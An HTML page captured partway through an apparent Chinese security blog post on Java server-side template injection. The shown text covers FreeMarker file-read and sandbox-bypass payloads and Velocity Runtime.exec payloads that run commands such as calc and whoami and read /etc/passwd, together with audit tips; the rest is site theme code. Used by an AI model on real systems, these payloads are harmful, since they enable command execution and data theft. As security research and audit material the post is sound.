<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign obj=&quot;freemarker.template.utility.ObjectConstructor&quot;?new()&gt;</span><br><span class="line">&lt;#assign fr=obj(&quot;java.io.FileReader&quot;,&quot;/etc/passwd&quot;)&gt;</span><br><span class="line">&lt;#assign br=obj(&quot;java.io.BufferedReader&quot;,fr)&gt;</span><br><span class="line">&lt;#list 1..10000 as i&gt;</span><br><span class="line">	&lt;#assign line=br.readLine()!&quot;&quot;&gt;</span><br><span class="line">	&lt;#if line?has_content&gt;$&#123;line&#125;&lt;#else&gt;&lt;#break&gt;&lt;/#if&gt;</span><br><span class="line">&lt;/#list&gt;</span><br></pre></td></tr></table></figure>

<h2 id="漏洞存在"><a href="#漏洞存在" class="headerlink" title="漏洞存在"></a>漏洞存在</h2><p>基本上该种模板注入漏洞存在于后端模板文件修改或上传的功能点，对应跟进去看代码，跟到最后基本就是通过<code>process()</code>函数来进行一个渲染，过程中要注意是否有进行一些安全配置</p>
<h2 id="沙箱绕过"><a href="#沙箱绕过" class="headerlink" title="沙箱绕过"></a>沙箱绕过</h2><p>参考文章：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/2463939">https://cloud.tencent.com/developer/article/2463939</a></p>
<blockquote>
<p>Freemarker存在编辑模板功能时为了防止模板注入通常会使用Configuration.setNewBuiltinClassResolver(TemplateClassResolver)或设置new_builtin_class_resolver来限制内建函数对类的访问(从 2.3.17版开始)，该配置有以下三种参数：</p>
<ul>
<li>UNRESTRICTED_RESOLVER：可以通过ClassUtil.forName(String)获得任何类</li>
<li>SAFER_RESOLVER：禁止加载ObjectConstructor，Execute和freemarker.template.utility.JythonRuntime这三个类</li>
<li>ALLOWS_NOTHING_RESOLVER：禁止解析任何类</li>
</ul>
</blockquote>
<h3 id="2-3-30以下"><a href="#2-3-30以下" class="headerlink" title="2.3.30以下"></a>2.3.30以下</h3><p><strong>方式1：绕过class.getClassloader反射加载Execute类</strong></p>
<p>我们可以使用java.security.protectionDomain的getClassLoader方法来获得类加载器，随后再一步一步反射调用Execute类，此payload构造时需要在数据模型中找到一个作为对象的变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign classloader=&lt;&lt;object&gt;&gt;.class.protectionDomain.classLoader&gt;</span><br><span class="line">&lt;#assign owc=classloader.loadClass(&quot;freemarker.template.ObjectWrapper&quot;)&gt;</span><br><span class="line">&lt;#assign dwf=owc.getField(&quot;DEFAULT_WRAPPER&quot;).get(null)&gt;</span><br><span class="line">&lt;#assign ec=classloader.loadClass(&quot;freemarker.template.utility.Execute&quot;)&gt;</span><br><span class="line">$&#123;dwf.newInstance(ec,null)(&quot;cmd.exe /c calc&quot;)&#125;</span><br></pre></td></tr></table></figure>

<p>举个例子，如下如所示，将payload中的object替换为archive插入载荷</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260113142231786.png" alt="image-20260113142231786"></p>
<p><strong>方式2：Spring Beans可用时直接禁用沙箱</strong> </p>
<p>此payload需要freemarker+spring并设置setExposeSpringMacroHelpers(true)或是application.propertices中配置spring.freemarker.expose-spring-macro-helpers&#x3D;true</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign ac=springMacroRequestContext.webApplicationContext&gt;</span><br><span class="line">  &lt;#assign fc=ac.getBean(&#x27;freeMarkerConfiguration&#x27;)&gt;</span><br><span class="line">    &lt;#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()&gt;</span><br><span class="line">      &lt;#assign VOID=fc.setNewBuiltinClassResolver(dcr)&gt;$&#123;&quot;freemarker.template.utility.Execute&quot;?new()(&quot;cmd.exe /c calc&quot;)&#125;</span><br></pre></td></tr></table></figure>

<h3 id="2-3-30以上"><a href="#2-3-30以上" class="headerlink" title="2.3.30以上"></a>2.3.30以上</h3><p>Freemarker在2.3.30中引入了一个基于MemberAccessPolicy的新沙箱且默认使用DefaultMemberAccessPolicy，但是漏洞的防护需要同时配置NewBuiltinClassResolver，否则用最开始的绕过payload即可攻击</p>
<p>首先查看黑名单文件unsafeMethods.properties文件发现其中并没有对ProtectionDomain.getClassLoader进行任何限制</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260113144349995.png" alt="image-20260113144349995"></p>
<p>紧接着发现在2.3.30以上引入的memberAccessPolicy策略，发现DefaultMemberAccessPolicy有个对应的DefaultMemberAccessPolicy-rules文件，查看DefaultMemberAccessPolicy-rules时可以看到ProtectionDomain.getClassLoader在2.3.30开始已经被block</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20260113144534648.png" alt="image-20260113144534648"></p>
<p>@whitelistPolicyAssignable的意思是这个类下面被列出来的方法就是白名单方法，如果前面有#的就不再是白名单方法</p>
<p>但是只要配置中expose-spring-macro-helpers为true，那么就依旧可以执行禁用沙箱的payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;#assign ac=springMacroRequestContext.webApplicationContext&gt;</span><br><span class="line">  &lt;#assign fc=ac.getBean(&#x27;freeMarkerConfiguration&#x27;)&gt;</span><br><span class="line">    &lt;#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()&gt;</span><br><span class="line">      &lt;#assign VOID=fc.setNewBuiltinClassResolver(dcr)&gt;$&#123;&quot;freemarker.template.utility.Execute&quot;?new()(&quot;cmd.exe /c calc&quot;)&#125;</span><br></pre></td></tr></table></figure>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>如果使用freemarker并给予编辑模版权限，除非freemarker版本在2.3.30及以上并配置new-builtin-class-resolver，否则均可被攻击，即使达到如上条件，如果expose-spring-macro-helpers为true，依然可以执行命令</p>
<h1 id="Velocity模板注入漏洞"><a href="#Velocity模板注入漏洞" class="headerlink" title="Velocity模板注入漏洞"></a>Velocity模板注入漏洞</h1><h2 id="解析方法使用"><a href="#解析方法使用" class="headerlink" title="解析方法使用"></a>解析方法使用</h2><p>Velocity在实际开发中有两种写法，一种是采用evaluate方法解析，一种是采用merge方法解析两种方法根据实际是应用场景需求选择，其本质都是对内容进行VTL解析</p>
<p><strong><code>evaluate()</code>动态解析字符串</strong></p>
<p>注：下面是java代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">String dynamicTemplate=&quot;Hello, $user! Today is $dateTool.format(&#x27;yyyy-MM-dd&#x27;)&quot;;</span><br><span class="line">VelocityContext context=new VelocityContext();</span><br><span class="line">context.put(&quot;user&quot;,&quot;Alice&quot;);</span><br><span class="line">context.put(&quot;dateTool&quot;,newDateTool());</span><br><span class="line"></span><br><span class="line">StringWriter writer=new StringWriter();</span><br><span class="line">Velocity.evaluate(context,writer,&quot;LogTag&quot;,dynamicTemplate);//关键方法</span><br><span class="line"></span><br><span class="line">System.out.println(writer.toString());</span><br></pre></td></tr></table></figure>

<p>输出结果：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hello, Alice! Today is 2026-01-13</span><br></pre></td></tr></table></figure>

<p><strong><code>merge()</code>解析预定义模板</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">//适用于：Web页面渲染等固定模板场景</span><br><span class="line">VelocityEngine engine=new VelocityEngine();</span><br><span class="line">engine.init(/*配置见前文*/);</span><br><span class="line"></span><br><span class="line">VelocityContext context=new VelocityContext();</span><br><span class="line">context.put(&quot;items&quot;,Arrays.asList(&quot;Apple&quot;,&quot;Banana&quot;));</span><br><span class="line"></span><br><span class="line">Template template=engine.getTemplate(&quot;templates/list.vm&quot;);//加载文件</span><br><span class="line">StringWriter writer=new StringWriter();</span><br><span class="line">template.merge(context,writer);//关键方法</span><br><span class="line"></span><br><span class="line">System.out.println(writer.toString());</span><br></pre></td></tr></table></figure>

<p>模板文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;ul&gt;</span><br><span class="line">#foreach($itemin$items)</span><br><span class="line">	&lt;li&gt;$velocityCount.$item&lt;/li&gt;</span><br><span class="line">#end</span><br><span class="line">&lt;/ul&gt;</span><br></pre></td></tr></table></figure>

<p>输出结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;ul&gt;</span><br><span class="line">	&lt;li&gt;1.Apple&lt;/li&gt;</span><br><span class="line">	&lt;li&gt;2.Banana&lt;/li&gt;</span><br><span class="line">&lt;/ul&gt;</span><br></pre></td></tr></table></figure>

<h2 id="POC-1"><a href="#POC-1" class="headerlink" title="POC"></a>POC</h2><p>&lt;&#x3D;2.4（？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">//无回显</span><br><span class="line">#set($e=&quot;e&quot;)</span><br><span class="line">$e.getClass().forName(&quot;java.lang.Runtime&quot;).getMethod(&quot;getRuntime&quot;,null).invoke(null,null).exec(&quot;open -a Calculator&quot;)</span><br><span class="line"></span><br><span class="line">//有回显</span><br><span class="line">#set($x=&#x27;&#x27;)##</span><br><span class="line">#set($rt = $x.class.forName(&#x27;java.lang.Runtime&#x27;))##</span><br><span class="line">#set($chr = $x.class.forName(&#x27;java.lang.Character&#x27;))##</span><br><span class="line">#set($str = $x.class.forName(&#x27;java.lang.String&#x27;))##</span><br><span class="line">#set($ex = $rt.getRuntime().exec(&#x27;whoami&#x27;))##</span><br><span class="line">$ex.waitFor()</span><br><span class="line">#set($out = $ex.getInputStream())##</span><br><span class="line">#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end</span><br><span class="line"></span><br><span class="line">//有回显</span><br><span class="line">#set($e=&quot;exp&quot;)</span><br><span class="line">#set($a=$e.getClass().forName(&quot;java.lang.Runtime&quot;).getMethod(&quot;getRuntime&quot;,null).invoke(null,null).exec($cmd))</span><br><span class="line">#set($input=$e.getClass().forName(&quot;java.lang.Process&quot;).getMethod(&quot;getInputStream&quot;).invoke($a))</span><br><span class="line">#set($sc=$e.getClass().forName(&quot;java.util.Scanner&quot;))</span><br><span class="line">#set($constructor=$sc.getDeclaredConstructor($e.getClass().forName(&quot;java.io.InputStream&quot;)))</span><br><span class="line">#set($scan=$constructor.newInstance($input).useDelimiter(&quot;\A&quot;))</span><br><span class="line">#if($scan.hasNext())</span><br><span class="line">	$scan.next()</span><br><span class="line">#end</span><br></pre></td></tr></table></figure>

<h2 id="审计思路"><a href="#审计思路" class="headerlink" title="审计思路"></a>审计思路</h2><p>1、看是否引入对应的依赖，关注版本是否符合利用&lt;&#x3D;2.4</p>
<p>2、通过全局搜索.evaluate(或.merge(或.getTemplate(方法查看是否存在使用</p>
<p>3、Velocity.evaluate(context,writer,”LogTag”,dynamicTemplate);关注dynamicTemplate是否可控，并且没有对输入进行过滤或限制</p>
<p>4、template.merge(context,writer);关注实例化的模板文件内容是否可控或可修改</p>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>License</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名-非商业性使用-相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>

<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"></div><div class="item" id="next"><div class="note">Older</div><a href="/2025/12/03/shiro%E5%AE%89%E5%85%A8%E6%A0%A1%E9%AA%8C%E6%B5%81%E7%A8%8B%E9%9B%B6%E5%9F%BA%E7%A1%80%E6%95%99%E5%AD%A6/">shiro安全校验流程零基础教学</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Sherlock</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1">Stellar 1.33.1</a> 主题创建。<br>本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">On This Page</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Thymeleaf%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-text">Thymeleaf模板注入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-text">攻击原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%89%88%E6%9C%AC%E5%8F%8A%E4%BF%AE%E5%A4%8D"><span class="toc-text">漏洞版本及修复</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC%E5%8F%8A%E4%B8%80%E4%BA%9B%E7%9A%84%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF"><span class="toc-text">POC及一些的绕过姿势</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RuoYi-v4-6-0"><span class="toc-text">RuoYi-v4.6.0</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FreeMarker%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-text">FreeMarker模板注入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E9%85%8D%E7%BD%AE"><span class="toc-text">安全配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-text">POC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8CPOC"><span class="toc-text">命令执行POC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96POC"><span class="toc-text">文件读取POC</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%AD%98%E5%9C%A8"><span class="toc-text">漏洞存在</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B2%99%E7%AE%B1%E7%BB%95%E8%BF%87"><span class="toc-text">沙箱绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-30%E4%BB%A5%E4%B8%8B"><span class="toc-text">2.3.30以下</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-30%E4%BB%A5%E4%B8%8A"><span class="toc-text">2.3.30以上</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Velocity%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-text">Velocity模板注入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E6%9E%90%E6%96%B9%E6%B3%95%E4%BD%BF%E7%94%A8"><span class="toc-text">解析方法使用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-1"><span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%A1%E8%AE%A1%E6%80%9D%E8%B7%AF"><span class="toc-text">审计思路</span></a></li></ol></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>Scroll to Top</span></a></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `Just`,
      min: `minutes ago`,
      hour: `hours ago`,
      day: `days ago`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
